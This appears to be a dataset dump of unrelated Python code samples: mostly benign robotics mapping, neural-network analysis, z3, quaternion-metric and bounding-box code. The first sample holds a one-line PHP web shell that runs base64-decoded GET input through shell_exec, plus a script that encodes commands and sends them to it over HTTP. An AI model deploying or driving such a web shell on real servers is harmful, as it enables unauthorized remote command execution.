content
stringlengths 5
1.05M
|
|---|
#!/usr/bin/python2
import sys, urllib, base64
import requests
##Procedural slop and I know it... but gets 'er done
## LOL
## '<?php "$a" = base64_decode($_GET["a"]); echo "$a", shell_exec("$a"); ?>'
encORdec="0" ##not yet implemented option decode
baseURL=""
line=""
is_base64ENC="0"
is_base64DEC="0" ##not yet implemented
is_URLencode="0"
is_URLdecode="0" ##not yet implemented
is_baseURL="0"
do_debugPrintLine = "0"
while encORdec != "1" and encORdec != "2":
encORdec=raw_input("Encode or decode?:\n[1] Encode\n[2] Decode\n")
if encORdec == "1":
is_base64ENC=1
# then might have to URL encode, and there might be a base URL.
while is_URLencode != "1" and is_URLencode != "2":
is_URLencode=raw_input("URLencode the b64?:\n[1] yes\n[2] no\n")
while is_baseURL != "1" and is_baseURL != "2":
is_baseURL=raw_input("Is there a base URL to put the encode onto?\n[1] Yes\n[2] No\n")
if is_baseURL == "1":
baseURL = raw_input("Give me the base URL:\n").rstrip()
if encORdec == "2":
## Not yet implemented, asshat!
print("._._.\n[x!x]\nVVVV\n^^^^\nNot yet implemented, asshat!")
sys.exit() ## because Not yet implemented, asshat!
while do_debugPrintLine != "1" and do_debugPrintLine != "2":
do_debugPrintLine=raw_input("Print decoded lines with output?:\n[1] Yes\n[2] No\n")
while line != "exit":
list=[]
line=""
userin="0"
req=[]
resp=[]
print("\n[!!] Give heredoc. End heredoc input with \"EOF\". Quit with \"exit\".:")
while line != "EOF" and line != "exit":
line=raw_input("")
if line != "EOF":
list.append(line)
for item in list:
str=""
pre=item
curr=""
post=""
if encORdec == "1":
str=base64.b64encode(item)
curr=str
if is_URLencode == "1":
tmp=str
str=urllib.quote_plus(tmp)
curr=str
if do_debugPrintLine == "1":
if is_URLencode == "1":
post=base64.b64decode(urllib.unquote_plus(str))
else:
post=base64.b64decode(str)
if is_baseURL == "1":
tmp=str
str=baseURL + tmp
# if encORdec == "2":
req.append(str)
print(str)
if do_debugPrintLine == "1":
print("\tpre: " + pre)
print("\tenc: " + curr)
print("\tdec: " + post)
if is_baseURL == '1':
userin=raw_input("GET request the URLs?:\n[1] Yes\n[2] No\n")
if userin == "1":
for item in req:
print(item)
headers = {'Accept-Encoding': 'identity'}
r=requests.get(item)
resp.append(r.text)
# print("\tStatus code = " + str(r.status_code))
print "\t", r.status_code
userin = raw_input("Print the returned source code responses to GET requests sent?:\n[1] Yes\n[2] No\n")
if userin == "1":
for i in range(len(resp)):
print("\n\n\n\n\n\n")
print(req[i])
usin=raw_input("Print the response to this request?\n[1] Yes\n[2] No\n")
if usin == "1":
print(resp[i])
sys.exit()
|
import torch
import numpy as np
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from models import ResNet18
from nad_computation import GradientCovarianceAnisotropyFinder
DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'
def model_gen_fun():
model = ResNet18(num_classes=1, num_channels=1).eval()
return model
anisotropy_finder = GradientCovarianceAnisotropyFinder(model_gen_fun=model_gen_fun,
scale=100,
num_networks=10000,
k=1024,
eval_point=torch.randn([1, 32, 32], device=DEVICE),
device=DEVICE,
batch_size=None)
eigenvalues, NADs = anisotropy_finder.estimate_NADs()
np.save('../NADs/ResNet18_NADs.npy', NADs)
np.save('../NADs/ResNet18_eigenvals.npy', eigenvalues)
|
#!/usr/bin/env python
import numpy as np
from mrfmap_ros.GVDBPyModules import GVDBInference, GVDBImage, gvdb_params, GVDBMapLikelihoodEstimator, KeyframeSelector, GVDBOctomapWrapper, PangolinViewer
from mrfmap_ros.MRFMapRosPyModules import GVDBBatchMapCreator
from mrfmap_ros.ReadTemporalCorrectedBag import ReadTemporalCorrectedBag
from mrfmap_ros.MRFMapGenerator import MRFMapGenerator
import pdb
from geometry import se3, SE3
import click
import yaml
import os
import rospy
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
dtype = np.float32
# Script options!
config_dir = '../../config/'
main_dir = '/home/icoderaven/bagfiles/'
didx = 1 # Dataset ID 0,1, or 2
plot_timings = True
show_map = True # Visualise map in Mayavi. Might have to restart script afterwards because of memory shenanigans
closeup = True # Show the map in Mayavi from hand picked camera pose
num_repeats = 1 # Multiple repeats, if required for timing data std.dev.
datasets = ['aditya3', 'ICL', 'coffin_world_640', 'cactus_garden']
bagfiles = ['aditya3.bag', 'living_room_with_rgb_noise.bag', 'coffin_world_640.bag', 'cactus_garden.bag']
# Read config files
rs_config_files = [config_dir+'realsense_848.yaml', config_dir+'ICL.yaml',
config_dir+'coffin_world_640.yaml', config_dir+'cactus_garden.yaml']
kin_config_files = [config_dir+'kinectone_new.yaml', config_dir+'ICL_gt.yaml',
config_dir+'coffin_world_640_gt.yaml', config_dir+'cactus_garden_gt.yaml']
dataset = datasets[didx]
bagfile = bagfiles[didx]
rs_config_file = rs_config_files[didx]
kin_config_file = kin_config_files[didx]
path_str = main_dir + dataset + '/'
bag_file_path = main_dir + dataset + '/' + bagfile
topics_to_parse = []
scale_factors = []
img_lags = []
Ks = []
img_dims = []
bias_poly_files = []
sigma_poly_files = []
cam_in_bodys = []
kf_thresholds = []
use_octos = []
is_icl_bag = False
world_frame_transform = np.eye(4, dtype=dtype)
for files in [rs_config_file, kin_config_file]:
with open(files) as f:
node = yaml.load(f)
viewer_node = node['viewer_params_nodes']
cam_in_bodys.append(
np.array(viewer_node['cam_in_body']).reshape(4, 4).astype(dtype))
topics_to_parse.append(viewer_node['camera_topic'])
topics_to_parse.append(viewer_node['odom_topic'])
scale_factors.append(viewer_node['img_scale_factor'])
img_lags.append(viewer_node['img_lag'])
kf_thresholds.append(
[viewer_node['rotation_thresh'], viewer_node['translation_thresh']])
use_octos.append(viewer_node['view_octomap'])
is_icl_bag = viewer_node['is_icl_bag']
if is_icl_bag:
world_frame_transform = np.array(viewer_node['world_frame_transform']).reshape(4, 4).astype(dtype)
gvdb_node = node['gvdb_params']
Ks.append(np.array(gvdb_node['K']).reshape(3, 3).astype(dtype))
img_dims.append([gvdb_node['rows'], gvdb_node['cols']])
bias_poly_files.append(gvdb_node['depth_bias_lookup'])
sigma_poly_files.append(gvdb_node['depth_sigma_lookup'])
# Check if map already exists, if not, do we want to overwrite it?
generate_mrfmap = False
params = gvdb_params()
params.load_from_file(rs_config_file)
suffix = '_res_' + str(dtype(params.res)).replace('.', '_') + '_rot_' + \
str(dtype(kf_thresholds[0][0])).replace('.', '_') + '_trans_' + str(dtype(kf_thresholds[0][1])).replace('.', '_')
if params.use_polys:
suffix += 'poly'
# Add special suffix for ICL
if topics_to_parse[0] == '/camera/depth/noisy_image':
suffix += 'noisy'
if os.path.exists(main_dir+dataset+'/generated/mrfmap' + suffix + '.npy'):
if raw_input('Overwrite mrfmap? y/n') in ['y', 'Y']:
generate_mrfmap = True
else:
generate_mrfmap = True
mrfmap = MRFMapGenerator(
rs_config_file, main_dir+dataset+'/generated/', 'mrfmap'+suffix)
if generate_mrfmap:
if plot_timings:
repeat = num_repeats
else:
repeat = 1
for i in range(repeat):
creator = GVDBBatchMapCreator(rs_config_file)
creator.load_bag(bag_file_path)
creator.process_saved_tuples()
mrfmap.inference = creator.get_inference_ptr()
print 'about to save mrfmap'
mrfmap.save_map()
print 'done!'
if show_map:
mrfmap.show_map(didx)
else:
if show_map:
mrfmap_npy = np.load(main_dir+dataset+'/generated/mrfmap'+suffix+'.npy')
mrf_like_estimator = GVDBMapLikelihoodEstimator(mrfmap.params, False)
mrf_like_estimator.load_map(mrfmap_npy[:, :3].astype(
dtype), mrfmap_npy[:, 3].astype(dtype))
mrfmap.inference = mrf_like_estimator
mrfmap.load_brick_data()
mrfmap.show_map(didx, 0.1, True, closeup)
if use_octos[0]:
if generate_mrfmap:
print 'Also saving octomap!'
# Save the generated octomap as well
mrfmap.inference = creator.get_octomap_ptr()
mrfmap.title = 'octomap'+suffix
mrfmap.save_map()
if show_map:
mrfmap.show_map(didx)
else:
if show_map:
octomap_npy = np.load(main_dir+dataset+'/generated/octomap'+suffix+'.npy')
octo_like_estimator = GVDBMapLikelihoodEstimator(mrfmap.params, False)
octo_like_estimator.load_map(octomap_npy[:, :3].astype(
dtype), octomap_npy[:, 3].astype(dtype))
mrfmap.inference = octo_like_estimator
mrfmap.title = 'octomap'+suffix
mrfmap.load_brick_data()
mrfmap.show_map(didx, 0.5, True, closeup)
raw_input('Done showing maps!!! Press any key to continue')
if generate_mrfmap:
time_str = creator.get_stats().split('\n')
types_to_time = ['inference', 'octomap']
means = []
stddevs = []
# Show timings
if plot_timings:
timing_fig = plt.figure()
for ttype in types_to_time:
# Pull out all the octomap vs mrfmap instances
entries = [t for t in reversed(time_str) if ttype in t]
# Pull out mean and std.dev
means.append(np.array([float(t.split('total=')[-1].split('s')[0]) for t in entries]))
stddevs.append(np.array([float(t.split('std. dev=')[-1].split('s')[0]) for t in entries]))
# And save this as well
np.save(main_dir+dataset+'/generated/' + ttype + suffix + '_timings_means.npy', means)
np.save(main_dir+dataset+'/generated/' + ttype + suffix + '_timings_stddevs.npy', stddevs)
if plot_timings:
# Plot them?
plt.plot(means[-1], label=ttype)
plt.fill_between(range(means[-1].shape[0]), means[-1] - 3*stddevs[-1], means[-1] + 3*stddevs[-1], alpha=0.2)
plt.xlabel('Image index')
plt.ylabel('Time taken (s)')
plt.grid(True)
plt.legend()
plt.tight_layout()
if plot_timings:
plt.show()
if generate_mrfmap:
del creator
# Ok, great. Now remember all those poses and images we had loaded?
# Now create a new set of gvdb params for kinect
print 'Loading params from file!'
# Init gvdb params
old_params = params
params_config_file = kin_config_file
params = gvdb_params()
params.load_from_file(params_config_file)
# Sanity check
if not np.allclose(params.dims, old_params.dims):
print 'Map dimensions are not the same!!! Fix config file!'
raise SystemExit
if not np.allclose(params.res, old_params.res):
print 'Map resolutions are not the same!!! Fix config file!'
raise SystemExit
# Load map
mrfmap_npy = np.load(main_dir+dataset+'/generated/mrfmap' + suffix + '.npy')
mrf_like_estimator = GVDBMapLikelihoodEstimator(params, False)
mrf_like_estimator.load_map(mrfmap_npy[:, :3].astype(
dtype), mrfmap_npy[:, 3].astype(dtype))
octomap_npy = np.load(main_dir+dataset+'/generated/octomap' + suffix + '.npy')
octomap_like_estimator = GVDBMapLikelihoodEstimator(params, False)
octomap_like_estimator.load_map(octomap_npy[:, :3].astype(
dtype), octomap_npy[:, 3].astype(dtype))
estimators = [mrf_like_estimator, octomap_like_estimator]
estimator_labels = ['MRF', 'Octo']
# Read the bag file for kinect data
bag_reader = ReadTemporalCorrectedBag(
topics_to_parse, bag_file_path, img_lags, scale_factors, world_frame_transform)
bag_reader.read()
print 'Reading done! Computing accuracies...'
accs = []
compute_roc = False
simple_accs = [[], []]
accs_for_simple_accs = np.linspace(0.0, 1.0, 21)
with click.progressbar(range(len(bag_reader.kin_data)),
length=len(bag_reader.kin_data)) as bar:
for index in bar:
img = bag_reader.kin_data[index][0].astype(dtype)
pose = bag_reader.kin_data[index][1].astype(dtype)
pose_kinect = np.dot(pose, cam_in_bodys[1]).astype(dtype)
acc = np.array([0., 0.])
for i, estimator in enumerate(estimators):
likeimg = np.zeros(img.shape, dtype=dtype)
accimage = np.zeros(img.shape, dtype=dtype)
# estimator.get_likelihood_image_at_pose_with_depth(pose_kinect, img, likeimg)
acc[i] = estimator.get_accuracy_image_at_pose_with_depth(pose_kinect, img, accimage)
if compute_roc:
simples = []
gvdb_img = GVDBImage(img)
for acc_thresh in accs_for_simple_accs:
estimator.set_acc_thresh(acc_thresh)
accimage = np.zeros(img.shape, dtype=dtype)
simples.append(estimator.get_simple_accuracy_at_pose(pose_kinect, gvdb_img))
simple_accs[i].append(simples)
accs.append(acc)
accs = np.array(accs)
# Add a little interactivity to see individual likelihood images
plt.close()
acc_fig = plt.figure()
nrows = len(estimators)+1
ax_data = plt.subplot2grid((nrows, 4), (0, 0), colspan=3, picker=True)
ax_depth_img = plt.subplot2grid(
(nrows, 4), (1, 0), colspan=1, title='Depth')
ax_like_imgs = []
ax_acc_imgs = []
ax_simple_acc_imgs = []
ax_like_imshow_handles = []
ax_acc_imshow_handles = []
ax_simple_acc_imshow_handles = []
test_img = np.random.rand(
bag_reader.kin_data[0][0].shape[0], bag_reader.kin_data[0][0].shape[1])
for i, estimator in enumerate(estimators):
ax_like_imgs.append(plt.subplot2grid((nrows, 4), (i+1, 1), colspan=1, title=estimator_labels[i]+' Likelihood'))
ax_acc_imgs.append(plt.subplot2grid((nrows, 4), (i+1, 2), colspan=1,
title=estimator_labels[i]+' Accuracy', picker=True))
ax_simple_acc_imgs.append(plt.subplot2grid((nrows, 4), (i+1, 3), colspan=1,
title=estimator_labels[i]+' Simple Accuracy'))
ax_like_imshow_handles.append(ax_like_imgs[-1].imshow(test_img, interpolation='none', vmin=-7, vmax=7))
ax_acc_imshow_handles.append(ax_acc_imgs[-1].imshow(test_img, interpolation='none', vmin=-1, vmax=2))
ax_simple_acc_imshow_handles.append(ax_simple_acc_imgs[-1].imshow(test_img, interpolation='none', vmin=-1, vmax=2))
ax_depth_imshow_handle = ax_depth_img.imshow(
bag_reader.kin_data[0][0], interpolation='none', vmin=0, vmax=5.0)
ax_data.plot(accs[:, 0], label='MRFMap')
ax_data.plot(accs[:, 1], label='OctoMap')
ax_data.legend()
ax_data.set_title('Accuracies at {0}m'.format(str(dtype(params.res))))
pressed = False
selected_idx = -1
# Add slider for set_acc_thresh
ax_slider = plt.subplot2grid((nrows, 4), (nrows-1, 0), colspan=1)
acc_thresh_slider = Slider(ax_slider, 'set_acc_thresh', 0.0, 1.0, valinit=0.1, valstep=0.01)
def slider_update(val):
for i, estimator in enumerate(estimators):
img = bag_reader.kin_data[selected_idx][0].astype(dtype)
pose = bag_reader.kin_data[selected_idx][1].astype(dtype)
pose_kinect = np.dot(pose, cam_in_bodys[1]).astype(dtype)
estimator.set_acc_thresh(val)
# Also update the simple accuracy image
simpleaccimage = np.zeros(img.shape, dtype=dtype)
estimator.get_simple_accuracy_image_at_pose_with_depth(
pose_kinect, img, simpleaccimage)
ax_simple_acc_imshow_handles[i].set_data(simpleaccimage)
acc_fig.canvas.draw()
def draw_at_idx(index):
global selected_idx
if index != selected_idx:
# Set the likelihood image to be the one computed at the corresponding index
img = bag_reader.kin_data[index][0].astype(dtype)
pose = bag_reader.kin_data[index][1].astype(dtype)
pose_kinect = np.dot(pose, cam_in_bodys[1]).astype(dtype)
for i, estimator in enumerate(estimators):
accimage = np.zeros(img.shape, dtype=dtype)
simpleaccimage = np.zeros(img.shape, dtype=dtype)
likeimage = np.zeros(img.shape, dtype=dtype)
estimator.get_likelihood_image_at_pose_with_depth(
pose_kinect, img, likeimage)
estimator.get_accuracy_image_at_pose_with_depth(
pose_kinect, img, accimage)
estimator.get_simple_accuracy_image_at_pose_with_depth(
pose_kinect, img, simpleaccimage)
ax_acc_imshow_handles[i].set_data(accimage)
ax_simple_acc_imshow_handles[i].set_data(simpleaccimage)
ax_like_imshow_handles[i].set_data(likeimage)
ax_depth_imshow_handle.set_data(bag_reader.kin_data[index][0])
# Also display line corresponding to selected index
for obj_handle in ax_data.findobj(match=type(plt.vlines(0, 0, 0))):
obj_handle.remove()
ax_data.vlines(index, 0, 1.0, linestyles='dotted', alpha=0.8)
acc_fig.canvas.draw()
selected_idx = index
def onmove(event):
if pressed and event.inaxes is ax_data:
draw_at_idx((event.xdata + 0.5).astype(np.int))
def onpress(event):
global pressed
if event.button == 1:
pressed = True
if event.inaxes is ax_data:
draw_at_idx((event.xdata + 0.5).astype(np.int))
if event.inaxes in ax_acc_imgs:
indx_x = (event.xdata + 0.5).astype(np.int)
indx_y = (event.ydata + 0.5).astype(np.int)
estimators[0].set_selected_x_y(indx_x, indx_y)
def onrelease(event):
global pressed
if event.button == 1:
pressed = False
if event.inaxes is ax_data:
draw_at_idx((event.xdata + 0.5).astype(np.int))
cid = acc_fig.canvas.mpl_connect('button_press_event', onpress)
rid = acc_fig.canvas.mpl_connect('button_release_event', onrelease)
mid = acc_fig.canvas.mpl_connect('motion_notify_event', onmove)
acc_thresh_slider.on_changed(slider_update)
draw_at_idx(0)
# plt.tight_layout()
plt.savefig(main_dir+dataset+'/generated/octomap' +
suffix + '_accuracies.pdf', bbox_inches='tight')
plt.show()
np.save(main_dir+dataset+'/generated/octomap' +
suffix + '_accuracies.npy', accs)
# TODO: Directly print latex table
# from tabulate import tabulate
print np.mean(accs, axis=0)
print np.std(accs, axis=0)
if compute_roc:
# Also show ROC-ish curve
fig = plt.figure()
simple_accs = np.array(simple_accs)
for i, blah in enumerate(estimator_labels):
means = np.mean(simple_accs[i], axis=0)
stddev = np.std(simple_accs[i], axis=0)
plt.plot(accs_for_simple_accs, means, label=estimator_labels[i])
plt.fill_between(accs_for_simple_accs, means - stddev, means + stddev, alpha=0.25, linewidth=0.0)
plt.legend()
plt.show()
# print 'Done! Dropping to pdb'
# pdb.set_trace()
rospy.signal_shutdown("Done!")
|
from z3 import *
CONNECTIVE_OPS = [Z3_OP_NOT,Z3_OP_AND,Z3_OP_OR,Z3_OP_IMPLIES,Z3_OP_IFF,Z3_OP_ITE]
REL_OPS = [Z3_OP_EQ,Z3_OP_LE,Z3_OP_LT,Z3_OP_GE,Z3_OP_GT]
OPERATORS = CONNECTIVE_OPS + REL_OPS
# var is tuple (type, name)
def createVar(var):
t = var[0]
n = var[1]
if t=="int":
return Int('%s' % n)
elif t=="bool":
return Bool('%s' % n)
elif t=="real":
return Real('%s' % n)
raise NotImplementedError(varType)
def createExpression(v, expr):
return eval(expr)
# creates a constraint which allow only key variable to change
def createCounterConstraint(key, variables, model):
constraints = []
for k, v in variables.iteritems():
if k==key:
x = v
constraints.append(Not(x == model[x]))
else:
x = v
constraints.append(x == model[x])
return constraints
def modelToDict(model):
return {x.name():model[x] for x in model}
def pPrintDict(d):
res = ""
for k, v in sorted(d.items()):
res += "{} : {}, ".format(k, v)
return res[:-1]
def block_model(s):
m = s.model()
s.add(Or([ f() != m[f] for f in m.decls() if f.arity() == 0]))
def isOperand(self):
node = self.value
t = node.kind()
return is_bool(node) and (is_var(node) or (is_app(node) and t not in OPERATORS))
def isOperator(self):
return not self.isOperand()
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
def __str__(self):
if self.value.decl() is not None:
return str(self.value.decl())
return str(self.value)
def insert(self, node):
if self.left is None:
self.left = Node(node)
for child in self.left.value.children():
self.left.insert(child)
elif self.right is None:
self.right = Node(node)
for child in self.right.value.children():
self.right.insert(child)
else:
self.left.insert(node)
def printTree(self, level=0, indent=0):
if level==0:
line = str(self)
indent = len(line)
else:
space = (level+indent) * ' '
dotted = level * '-'
line = "{}|{}{}".format(space, dotted, str(self))
#line = "{}|{}".format(space, str(self))
indent += len(str(self))
if self.right:
self.right.printTree(level+1, indent)
print line
if self.left:
self.left.printTree(level+1, indent)
# Returns root of constructed tree
def constructTree(variables, expr):
root = Node(expr)
print "constructing tree from ", expr
for child in expr.children():
root.insert(child)
s = Solver()
return root
variables = {x[1]:createVar(x) for x in [['bool','A'], ['bool','B'], ['bool','C']]}
expr = createExpression(variables, "And(Or(v['A'],v['B']), v['C'])")
r = constructTree(variables, expr)
r.printTree()
|
# Copyright (c) 2020, Michael Boyle
# See LICENSE file for details:
# <https://github.com/moble/quaternionic/blob/master/LICENSE>
import numpy as np
from . import jit, guvectorize, algebra, float64
from .utilities import ndarray_args
_divide = jit(algebra.divide)
_log = jit(algebra.log)
_absolute = jit(algebra.absolute)
def CreateMetrics(jit=jit, guvectorize=guvectorize):
class Rotor(object):
@ndarray_args
@guvectorize([(float64[:], float64[:], float64[:])], '(n),(n)->()')
def intrinsic(q1, q2, out):
"""Geodesic distance between rotors within the Spin(3)=SU(2) manifold.
This function is equivalent to
np.absolute(np.log(q1 / q2))
which is a measure of the "distance" between two quaternions. Note
that no normalization is performed, which means that if q1 and/or
q2 do not have unit norm, this is a more general type of distance.
If they are normalized, the result of this function is half the
angle through which vectors rotated by q1 would need to be rotated
to lie on the same vectors rotated by q2.
Parameters
----------
q1, q2 : QuaternionicArray
Quaternionic arrays to be measured
See also
--------
quaternionic.distance.rotor.chordal
quaternionic.distance.rotation.intrinsic
quaternionic.distance.rotation.chordal
"""
qtemp = np.empty(4)
_divide(q1, q2, qtemp)
_log(qtemp, qtemp)
_absolute(qtemp, out)
out[0] *= 2
@ndarray_args
@guvectorize([(float64[:], float64[:], float64[:])], '(n),(n)->()')
def chordal(q1, q2, out):
"""Euclidean distance between rotors.
This function is equivalent to
np.absolute(q1 - q2)
Note that no normalization is performed. If the quaternions are
normalized, this represents the length of the chord joining these
two points on the unit 3-sphere, considered as embedded in
Euclidean 4-space.
Parameters
----------
q1, q2 : QuaternionicArray
Quaternionic arrays to be measured
See also
--------
quaternionic.distance.rotor.intrinsic
quaternionic.distance.rotation.intrinsic
quaternionic.distance.rotation.chordal
"""
out[0] = np.sqrt((q1[0]-q2[0])**2 + (q1[1]-q2[1])**2 + (q1[2]-q2[2])**2 + (q1[3]-q2[3])**2)
class Rotation(object):
@ndarray_args
@guvectorize([(float64[:], float64[:], float64[:])], '(n),(n)->()')
def intrinsic(q1, q2, out):
"""Geodesic distance between rotations within the SO(3) manifold.
This function is equivalent to
min(
np.absolute(np.log(q1 / q2)),
np.absolute(np.log(q1 / -q2))
)
which is a measure of the "distance" between two rotations. Note
that no normalization is performed, which means that if q1 and/or
q2 do not have unit norm, this is a more general type of distance.
If they are normalized, the result of this function is half the
angle through which vectors rotated by q1 would need to be rotated
to lie on the same vectors rotated by q2.
Parameters
----------
q1, q2 : QuaternionicArray
Quaternionic arrays to be measured
See also
--------
quaternionic.distance.rotor.chordal
quaternionic.distance.rotor.intrinsic
quaternionic.distance.rotation.chordal
"""
qtemp = np.empty(4)
a = (q1[0]-q2[0])**2 + (q1[1]-q2[1])**2 + (q1[2]-q2[2])**2 + (q1[3]-q2[3])**2
b = (q1[0]+q2[0])**2 + (q1[1]+q2[1])**2 + (q1[2]+q2[2])**2 + (q1[3]+q2[3])**2
if b > a:
_divide(q1, q2, qtemp)
else:
_divide(q1, -q2, qtemp)
_log(qtemp, qtemp)
_absolute(qtemp, out)
out[0] *= 2
@ndarray_args
@guvectorize([(float64[:], float64[:], float64[:])], '(n),(n)->()')
def chordal(q1, q2, out):
"""Euclidean distance between rotations.
This function is equivalent to
min(
np.absolute(q1 - q2),
np.absolute(q1 + q2)
)
Note that no normalization is performed. If the quaternions are
normalized, this represents the length of the chord joining these
two points on the unit 3-sphere, considered as embedded in
Euclidean 4-space.
Parameters
----------
q1, q2 : QuaternionicArray
Quaternionic arrays to be measured
See also
--------
quaternionic.distance.rotor.intrinsic
quaternionic.distance.rotor.chordal
quaternionic.distance.rotation.intrinsic
"""
a = (q1[0]-q2[0])**2 + (q1[1]-q2[1])**2 + (q1[2]-q2[2])**2 + (q1[3]-q2[3])**2
b = (q1[0]+q2[0])**2 + (q1[1]+q2[1])**2 + (q1[2]+q2[2])**2 + (q1[3]+q2[3])**2
if b > a:
out[0] = np.sqrt(a)
else:
out[0] = np.sqrt(b)
return Rotor, Rotation
rotor, rotation = CreateMetrics()
|
games = ["chess", "soccer", "tennis"]
foods = ["chicken", "milk", "fruits"]
favorites = games + foods
print(favorites)
|
# --------------------------------------------------------
# Multitask Network Cascade
# Modified from py-faster-rcnn (https://github.com/rbgirshick/py-faster-rcnn)
# Copyright (c) 2016, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
import numpy as np
from utils.cython_bbox import bbox_overlaps
from mnc_config import cfg
def compute_targets(rois, overlaps, labels):
"""
Compute bounding-box regression targets for an image.
"""
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= cfg.TRAIN.BBOX_THRESH)[0]
# Get IoU overlap each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(
np.ascontiguousarray(rois[ex_inds, :], dtype=np.float),
np.ascontiguousarray(rois[gt_inds, :], dtype=np.float))
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
targets = np.zeros((rois.shape[0], 5), dtype=np.float32)
targets[ex_inds, 0] = labels[ex_inds]
targets[ex_inds, 1:] = bbox_transform(ex_rois, gt_rois)
return targets
def bbox_transform(ex_rois, gt_rois):
"""
Compute bbox regression targets of external rois
with respect to gt rois
"""
ex_widths = ex_rois[:, 2] - ex_rois[:, 0] + 1.0
ex_heights = ex_rois[:, 3] - ex_rois[:, 1] + 1.0
ex_ctr_x = ex_rois[:, 0] + 0.5 * ex_widths
ex_ctr_y = ex_rois[:, 1] + 0.5 * ex_heights
gt_widths = gt_rois[:, 2] - gt_rois[:, 0] + 1.0
gt_heights = gt_rois[:, 3] - gt_rois[:, 1] + 1.0
gt_ctr_x = gt_rois[:, 0] + 0.5 * gt_widths
gt_ctr_y = gt_rois[:, 1] + 0.5 * gt_heights
targets_dx = (gt_ctr_x - ex_ctr_x) / ex_widths
targets_dy = (gt_ctr_y - ex_ctr_y) / ex_heights
targets_dw = np.log(gt_widths / ex_widths)
targets_dh = np.log(gt_heights / ex_heights)
targets = np.vstack(
(targets_dx, targets_dy, targets_dw, targets_dh)).transpose()
return targets
def bbox_transform_inv(boxes, deltas):
"""
invert bounding box transform
apply delta on anchors to get transformed proposals
"""
if boxes.shape[0] == 0:
return np.zeros((0, deltas.shape[1]), dtype=deltas.dtype)
boxes = boxes.astype(deltas.dtype, copy=False)
widths = boxes[:, 2] - boxes[:, 0] + 1.0
heights = boxes[:, 3] - boxes[:, 1] + 1.0
ctr_x = boxes[:, 0] + 0.5 * widths
ctr_y = boxes[:, 1] + 0.5 * heights
dx = deltas[:, 0::4]
dy = deltas[:, 1::4]
dw = deltas[:, 2::4]
dh = deltas[:, 3::4]
pred_ctr_x = dx * widths[:, np.newaxis] + ctr_x[:, np.newaxis]
pred_ctr_y = dy * heights[:, np.newaxis] + ctr_y[:, np.newaxis]
pred_w = np.exp(dw) * widths[:, np.newaxis]
pred_h = np.exp(dh) * heights[:, np.newaxis]
pred_boxes = np.zeros(deltas.shape, dtype=deltas.dtype)
# x1
pred_boxes[:, 0::4] = pred_ctr_x - 0.5 * pred_w
# y1
pred_boxes[:, 1::4] = pred_ctr_y - 0.5 * pred_h
# x2
pred_boxes[:, 2::4] = pred_ctr_x + 0.5 * pred_w
# y2
pred_boxes[:, 3::4] = pred_ctr_y + 0.5 * pred_h
return pred_boxes
def clip_boxes(boxes, im_shape):
"""
Clip boxes inside image boundaries
"""
x1 = boxes[:, 0::4]
y1 = boxes[:, 1::4]
x2 = boxes[:, 2::4]
y2 = boxes[:, 3::4]
keep = np.where((x1 >= 0) & (x2 <= im_shape[1] - 1) & (y1 >= 0) & (y2 <= im_shape[0] - 1))[0]
clipped_boxes = np.zeros(boxes.shape, dtype=boxes.dtype)
# x1 >= 0
clipped_boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0)
# y1 >= 0
clipped_boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0)
# x2 < im_shape[1]
clipped_boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0)
# y2 < im_shape[0]
clipped_boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0)
return clipped_boxes, keep
def filter_small_boxes(boxes, min_size):
"""
Remove all boxes with any side smaller than min_size.
"""
ws = boxes[:, 2] - boxes[:, 0] + 1
hs = boxes[:, 3] - boxes[:, 1] + 1
keep = np.where((ws >= min_size) & (hs >= min_size))[0]
return keep
def scale_boxes(boxes, alpha):
"""
Scale boxes from w/h to alpha * w/h while keep center unchanged
Args:
boxes: a set of boxes specified using x1, y1, x2, y2
alpha: scaling factor
Returns:
boxes: boxes after applying scaling
"""
w = boxes[:, 2] - boxes[:, 0] + 1
h = boxes[:, 3] - boxes[:, 1] + 1
ctr_x = boxes[:, 0] + 0.5 * w
ctr_y = boxes[:, 1] + 0.5 * h
scaled_w = w * alpha
scaled_h = h * alpha
scaled_boxes = np.zeros(boxes.shape, dtype=boxes.dtype)
scaled_boxes[:, 0] = ctr_x - 0.5 * scaled_w
scaled_boxes[:, 1] = ctr_y - 0.5 * scaled_h
scaled_boxes[:, 2] = ctr_x + 0.5 * scaled_w
scaled_boxes[:, 3] = ctr_y + 0.5 * scaled_h
return scaled_boxes
def bbox_compute_targets(ex_rois, gt_rois, normalize):
"""
Compute bounding-box regression targets for an image
Parameters:
-----------
ex_rois: ROIs from external source (anchors or proposals)
gt_rois: ground truth ROIs
normalize: whether normalize box (since RPN doesn't need to normalize)
Returns:
-----------
Relative value for anchor or proposals
"""
assert ex_rois.shape == gt_rois.shape
targets = bbox_transform(ex_rois, gt_rois)
if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED and normalize:
# Optionally normalize targets by a precomputed mean and std
targets = ((targets - np.array(cfg.TRAIN.BBOX_NORMALIZE_MEANS)) /
np.array(cfg.TRAIN.BBOX_NORMALIZE_STDS))
return targets.astype(np.float32, copy=False)
def get_bbox_regression_label(bbox_target_data, num_class):
"""Bounding-box regression targets (bbox_target_data) are stored in a
compact form N x (class, tx, ty, tw, th)
This function expands those targets into the 4-of-4*K representation used
by the network (i.e. only one class has non-zero targets).
Returns:
bbox_target (ndarray): N x 4K blob of regression targets
bbox_inside_weights (ndarray): N x 4K blob of loss weights
"""
assert bbox_target_data.shape[1] == 5
clss = bbox_target_data[:, 0]
bbox_targets = np.zeros((clss.size, 4 * num_class), dtype=np.float32)
